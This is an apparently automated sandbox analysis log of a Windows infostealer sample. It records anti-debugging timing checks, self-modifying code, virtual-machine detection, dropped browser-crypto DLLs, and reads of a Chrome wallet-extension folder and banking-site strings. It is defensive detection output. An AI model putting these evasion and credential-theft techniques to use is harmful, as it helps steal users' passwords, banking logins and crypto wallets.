Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E1D25 second address: 7E1D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E1D2A second address: 7E1D39 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8EA4C24F98h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EFB16 second address: 7EFB22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F8EA53EA356h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F3804 second address: 7F380A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F380A second address: 7F381F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8EA53EA35Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F381F second address: 7F384A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4C24FA9h 0x00000007 jbe 00007F8EA4C24F96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007F8EA4C24F96h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 71A75C second address: 71A760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F8FB0 second address: 7F8FC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8EA4C24FA0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F8FC6 second address: 7F8FEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F8EA53EA356h 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F8EA53EA360h 0x00000010 popad 0x00000011 pushad 0x00000012 jl 00007F8EA53EA356h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F8FEB second address: 7F9002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8EA4C24FA1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F9002 second address: 7F9016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F9016 second address: 7F9021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8EA4C24F96h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F9021 second address: 7F9028 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F9028 second address: 7F903C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8EA4C24F9Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F7C4D second address: 7F7C57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F7C57 second address: 7F7C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F7DB4 second address: 7F7DBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F7DBA second address: 7F7DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F7DC0 second address: 7F7DED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA53EA366h 0x00000007 jng 00007F8EA53EA35Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F8CDA second address: 7F8CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F8CE0 second address: 7F8D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jbe 00007F8EA53EA367h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F8EA53EA35Eh 0x00000014 js 00007F8EA53EA36Ch 0x0000001a jmp 00007F8EA53EA360h 0x0000001f jp 00007F8EA53EA356h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FB923 second address: 7FB95F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4C24FA8h 0x00000007 jmp 00007F8EA4C24FA4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f jnp 00007F8EA4C24F98h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FBAC3 second address: 7FBAC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 809B44 second address: 809B4E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8EA4C24F9Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81A042 second address: 81A05D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8EA53EA356h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8EA53EA35Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81A05D second address: 81A061 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81A061 second address: 81A067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 829A29 second address: 829A3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4C24F9Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 829A3B second address: 829A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 829A44 second address: 829A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 828861 second address: 828865 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 828865 second address: 82887E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8EA4C24FA1h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82887E second address: 828882 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8289E2 second address: 8289E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 828C9E second address: 828CB0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8EA53EA356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007F8EA53EA358h 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 828CB0 second address: 828CB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 828CB6 second address: 828CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 828CBA second address: 828CBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 829224 second address: 829228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 829228 second address: 829230 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 829230 second address: 829251 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8EA53EA358h 0x00000008 jl 00007F8EA53EA35Ch 0x0000000e jng 00007F8EA53EA356h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 jns 00007F8EA53EA356h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 829251 second address: 829272 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4C24FA8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 829272 second address: 829289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8EA53EA35Fh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82955A second address: 82958E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F8EA4C24FA3h 0x0000000d jmp 00007F8EA4C24FA8h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82958E second address: 8295A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8EA53EA35Eh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82971E second address: 82973D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8EA4C24FA5h 0x00000009 jng 00007F8EA4C24F96h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82973D second address: 829747 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8EA53EA356h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 829747 second address: 82975F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F8EA4C24F9Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82975F second address: 829769 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8EA53EA356h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82B04D second address: 82B051 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82B051 second address: 82B06C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8EA53EA365h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82D90B second address: 82D90F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82D90F second address: 82D936 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jnp 00007F8EA53EA35Ch 0x0000000f jns 00007F8EA53EA356h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F8EA53EA360h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82DBAA second address: 82DBAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82DBAE second address: 82DBBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82DBBB second address: 82DBD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4C24FA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82DC67 second address: 82DCAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA53EA35Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F8EA53EA369h 0x0000000f nop 0x00000010 push 00000004h 0x00000012 mov dx, 0A70h 0x00000016 push 0524F0F2h 0x0000001b pushad 0x0000001c pushad 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f push edi 0x00000020 pop edi 0x00000021 popad 0x00000022 jnl 00007F8EA53EA35Ch 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82DEE4 second address: 82DEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82DEE8 second address: 82DEEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82F775 second address: 82F792 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8EA4C24F96h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F8EA4C24F9Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 831313 second address: 831319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 831319 second address: 83131F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 537020D second address: 5370214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5370214 second address: 5370263 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8EA4C24FA2h 0x00000009 add si, 92E8h 0x0000000e jmp 00007F8EA4C24F9Bh 0x00000013 popfd 0x00000014 mov dh, cl 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push esi 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushfd 0x0000001e jmp 00007F8EA4C24F9Ch 0x00000023 xor ecx, 4580A548h 0x00000029 jmp 00007F8EA4C24F9Bh 0x0000002e popfd 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5370263 second address: 537026E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 movzx eax, bx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 537026E second address: 53702A3 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8EA4C24FA1h 0x00000008 sub al, 00000066h 0x0000000b jmp 00007F8EA4C24FA1h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 mov dword ptr [esp], ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov edi, eax 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53702A3 second address: 53702E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 494D8EB4h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F8EA53EA366h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F8EA53EA367h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5370A97 second address: 5370AF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov eax, 42DBD85Dh 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F8EA4C24FA8h 0x00000011 push eax 0x00000012 pushad 0x00000013 mov edx, 46670A94h 0x00000018 mov ebx, 78F43C00h 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f pushad 0x00000020 mov edi, eax 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 pushad 0x00000026 mov ah, 32h 0x00000028 mov edx, 7CD5EA48h 0x0000002d popad 0x0000002e pop ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F8EA4C24FA9h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5370AF6 second address: 5370B0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA53EA361h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5370B0B second address: 5370B1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8EA4C24F9Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5370B1B second address: 5370B1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 5A1B7E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 5A1A7E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 756533 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00354910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00354910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0034DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0034E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0034BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0034F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00353EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00353EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003416D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_003538B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0034ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00354570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00354570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0034DE10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00341160 GetSystemInfo,ExitProcess,

0_2_00341160

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: AEBKFIJE.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: AEBKFIJE.0.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: AEBKFIJE.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: AEBKFIJE.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: AEBKFIJE.0.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: AEBKFIJE.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
